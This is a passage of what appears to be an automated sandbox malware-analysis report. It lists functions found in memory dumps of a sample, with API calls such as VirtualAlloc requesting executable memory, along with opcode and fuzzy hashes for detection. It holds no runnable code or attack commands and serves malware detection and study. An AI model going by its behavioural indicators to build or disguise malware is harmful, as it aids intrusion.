                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 1b7654e9ba8801b3273b4d415fa62292fd0be11e22c88c1545836acc0748d3ca
                                • Instruction ID: 8d50b40175cd5d55bbf2bdc2c1f1af36d77f3cee4be9c570d54b6cce8544da35
                                • Opcode Fuzzy Hash: 1b7654e9ba8801b3273b4d415fa62292fd0be11e22c88c1545836acc0748d3ca
                                • Instruction Fuzzy Hash: 8C2184B1D44269AFEB20CA24CC80FEEB775EB84300F20C1E5E90D66644DB389EC58F15
                                Function 02923007 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: fdf94020f97f6d62972922ffa48bcac57a446b4d85dbfcfa11612f614eb66614
                                • Instruction ID: 5df7359fe7e98f5f655b82226194c25b7a0112d7e5c5df594decb01885cba1aa
                                • Opcode Fuzzy Hash: fdf94020f97f6d62972922ffa48bcac57a446b4d85dbfcfa11612f614eb66614
                                • Instruction Fuzzy Hash: 9B11BFB1C05276AFD724DB54CC40ADABBB8AF01300F0185FAE84CAB181D6399A84CF91
                                Function 031FC670 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2729788978.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                • Associated: 00000000.00000002.2729788978.00000000038CA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.2729788978.00000000038CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.2729788978.00000000038EA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.2729788978.00000000038F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_31a0000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 85b07341f977adfd1331a972d0bd069f00081ffb41b5367fe339be9e9d3b190f
                                • Instruction ID: 933be8071f0d6d3a30d3a4238a8b18ece7488d0241ab979ff6528888495a31a8
                                • Opcode Fuzzy Hash: 85b07341f977adfd1331a972d0bd069f00081ffb41b5367fe339be9e9d3b190f
                                • Instruction Fuzzy Hash: 82E09275505B40CFCB15DF28C2C5606BBF0EB88A00F0485A8DE098F70AE774EE10DAD2
                                Function 0296A695 Relevance: 1.5, APIs: 1, Instructions: 250memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 1636317e09ed9bf6e723c1ba0692f9dea90b71a868ce5630038a96af926d361b
                                • Instruction ID: 0f576ecb9445df7f96b6c1c6580efdc3b234a1bac4366be6c2bb6c7911e1ff18
                                • Opcode Fuzzy Hash: 1636317e09ed9bf6e723c1ba0692f9dea90b71a868ce5630038a96af926d361b
                                • Instruction Fuzzy Hash: 07B179B0E005688FDB24CB18CD98BFAB7B9EF85305F1485EAD849A7240D7756EC1CE81
                                Function 029288CD Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: b10c66b9bc5f3e90f82088c972bcfc3a901e9b666b2aec7145243faed51f36a5
                                • Instruction ID: e456b076085f1f6fbe6d166bc3bce68bf6723dadd5d40b8e52f693024f9409ec
                                • Opcode Fuzzy Hash: b10c66b9bc5f3e90f82088c972bcfc3a901e9b666b2aec7145243faed51f36a5
                                • Instruction Fuzzy Hash: A261E3A1E542689BFB24CA14DC80BBE7779FF84310F1081FAD50DA7684D6795EC58F22
                                Function 0296AEDA Relevance: 1.4, APIs: 1, Instructions: 182memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 9dcb5016c63e2333bff5ee4861b1f6aedf1fba27d38d14520fd16675bfbbcc41
                                • Instruction ID: 44073d36bdf26dc8d29d64db8f9ec475ccbc7722272128f4234a912b6dd105e0
                                • Opcode Fuzzy Hash: 9dcb5016c63e2333bff5ee4861b1f6aedf1fba27d38d14520fd16675bfbbcc41
                                • Instruction Fuzzy Hash: BD812770E056A89FDB64CF04CCA4BAABBB5BF45315F1485EAD40DA6241D7316EC1CF41
                                Function 029288E6 Relevance: 1.4, APIs: 1, Instructions: 179memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 0b617e0f6ef83fe5512f8795f3340a5b6ec224eae1060b8db9869d3801b95664
                                • Instruction ID: c331eafd86cf1119e68b3727298ae9c7e2ee1603f174bbc3c6510acf6baae78a
                                • Opcode Fuzzy Hash: 0b617e0f6ef83fe5512f8795f3340a5b6ec224eae1060b8db9869d3801b95664
                                • Instruction Fuzzy Hash: 9461E4A1E542A89BFB24CB10DC80BAE7779FF94310F1081FAD50DA7684D6795EC58F12
                                Function 02927E5F Relevance: 1.4, APIs: 1, Instructions: 168memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: ac7ca0732e2be073d3d326576cecf9c9f1eeef36eaae446d3727abd5e343bb22
                                • Instruction ID: f27d7803b983221a1bd1d49072bf9f53d26a5bd42d517c575e2c23ff82400d63
                                • Opcode Fuzzy Hash: ac7ca0732e2be073d3d326576cecf9c9f1eeef36eaae446d3727abd5e343bb22
                                • Instruction Fuzzy Hash: E151F5E1E542689BF724CB10EC80BAA7279FF94310F0091FAD50DAB684D67D5EC58F22
                                Function 0292865C Relevance: 1.4, APIs: 1, Instructions: 167memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e5393672f01a627fe12574738cbc91bb6550cb356b5f867dcab9fae0254c438e
                                • Instruction ID: e4671e40b75bf02cfa6530d845f2585f325aaac9c5c9498c4f21b09fcc144c13
                                • Opcode Fuzzy Hash: e5393672f01a627fe12574738cbc91bb6550cb356b5f867dcab9fae0254c438e
                                • Instruction Fuzzy Hash: DF61B1A5D542A89BFB24CB10DC40BAAB779FF94310F0081FAD50DA7684D6795EC58F12
                                Function 02928289 Relevance: 1.4, APIs: 1, Instructions: 161memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 86244814b98a3eade797157fc034be4315a78ae56939ac3653b6c79c8390cd6f
                                • Instruction ID: f9910973ffe1bcf4b9c0f4cfc53ad11ebd511358f09dc5cef4fab12108ca2198
                                • Opcode Fuzzy Hash: 86244814b98a3eade797157fc034be4315a78ae56939ac3653b6c79c8390cd6f
                                • Instruction Fuzzy Hash: 5A51D4A1E542A89BF720CB10DC80BAE7379FF94710F0091FAD50DAB684D6795EC58F22
                                Function 0296B092 Relevance: 1.3, APIs: 1, Instructions: 93COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6ab29d4f8b7a46f077a13b6b77f3b5a530d6200c9a980115bb584d2fad02f115
                                • Instruction ID: cca5fabdd45c53e67867f8caa542d49019a094ba306462c22feaa71fbef5b8db
                                • Opcode Fuzzy Hash: 6ab29d4f8b7a46f077a13b6b77f3b5a530d6200c9a980115bb584d2fad02f115
                                • Instruction Fuzzy Hash: 643181709086A49ADB64CA18CCB87BE7BB5AB46219F1484EAD84EF6140EB345EC0CF41
                                Function 0296AA80 Relevance: 1.3, APIs: 1, Instructions: 89memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 2a69f241b71c1bac846d69ff7b52b3bc6e9435ec40fc6e3d11a15bb4f4ee1fb9
                                • Instruction ID: 0299aa22f9172d0410c8eff4bcf98e255f92b948f9b1f89e0938134c0d6d2a08
                                • Opcode Fuzzy Hash: 2a69f241b71c1bac846d69ff7b52b3bc6e9435ec40fc6e3d11a15bb4f4ee1fb9
                                • Instruction Fuzzy Hash: 4331C5B2D04228AEF7244A14DC59BFB7BB8EF44310F4941FAED0D76280D6795EC58E92
                                Function 0296B111 Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: dc88ed5d1750d5df173891be12f7e1de04377229d625ddb97c8b360e4dbe3a3d
                                • Instruction ID: feb4f6bf71a349637d631050e660eb0ab0d145966d0937189aa609a0bc2c760e
                                • Opcode Fuzzy Hash: dc88ed5d1750d5df173891be12f7e1de04377229d625ddb97c8b360e4dbe3a3d
                                • Instruction Fuzzy Hash: 4B014071D09628AFEB608A14CCA87B9B7B4EB05319F1044EAD90DF6280EB745FC0CF41
                                Function 0296AABD Relevance: 1.3, APIs: 1, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: b140a57042a2b5df7af0dec143465de8b1f40078b53a9b95bcf8e88430bcfe27
                                • Instruction ID: dd0e6510a6a5b26d068c1e19fab774d29f27369129ed0daef35d7a50a4434893
                                • Opcode Fuzzy Hash: b140a57042a2b5df7af0dec143465de8b1f40078b53a9b95bcf8e88430bcfe27
                                • Instruction Fuzzy Hash: 0401D671D042199EF7245A24DC59BFA7BF8EB04314F4400EAE90DB5140DB7A5EC08F51
                                Function 0296B18E Relevance: 1.3, APIs: 1, Instructions: 39memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 16991b2239e3acd76b216d730c121b442dc7fa9feeaacb996dcba55a638d7ee3
                                • Instruction ID: f90acaf5817f540ad4cb0957061a472601c2b7d42e0563f7ec83955f10ab96a5
                                • Opcode Fuzzy Hash: 16991b2239e3acd76b216d730c121b442dc7fa9feeaacb996dcba55a638d7ee3
                                • Instruction Fuzzy Hash: 0D014C709052289FEB708A14CC98BA9B7F5AB45329F1045D6D44DB6280DB705AC0CF41
                                Function 0296AEC4 Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 906be528f9242ccd56124d5dd93b6fe65046a9b2d0f2b508eddea02092605a97
                                • Instruction ID: 85a8726f9ab93c7ee1e01aabd6426135f15f669859b207fba0d1e0d3f4cacf3f
                                • Opcode Fuzzy Hash: 906be528f9242ccd56124d5dd93b6fe65046a9b2d0f2b508eddea02092605a97
                                • Instruction Fuzzy Hash: 8401AD71E493549FEB219B248D98B75BBB4FF46315F0480EBD94CAA282CB714A81CF52
                                Function 0296B12F Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: dfd5d3b2e8e31d2db21401460d27dc2f5de61840d5742f3d7bde978e517c204f
                                • Instruction ID: 5461bdbdefbbb2c9efc4dc7119db9fbf5f69b130cc9e28671d5e4ccae0cbd62a
                                • Opcode Fuzzy Hash: dfd5d3b2e8e31d2db21401460d27dc2f5de61840d5742f3d7bde978e517c204f
                                • Instruction Fuzzy Hash: A601E870A052689FEB609B18CCA9BADB7F5AB45729F1084DAD54DB6240DB705EC0CF41
                                Function 0296A6B5 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 2110b45590ee2b4b47884420999b0ea34027dc23d980e46c2fd5625cc67a1172
                                • Instruction ID: 2a3485c872764eb43b4380a56f7a8342fa668e0d272234f9aa41eee3c3c7cb5a
                                • Opcode Fuzzy Hash: 2110b45590ee2b4b47884420999b0ea34027dc23d980e46c2fd5625cc67a1172
                                • Instruction Fuzzy Hash: 10F09BB2F05118AEF7304519DC2DFBA7BB8EB46714F0005E6D58DA5180D6744AC18B52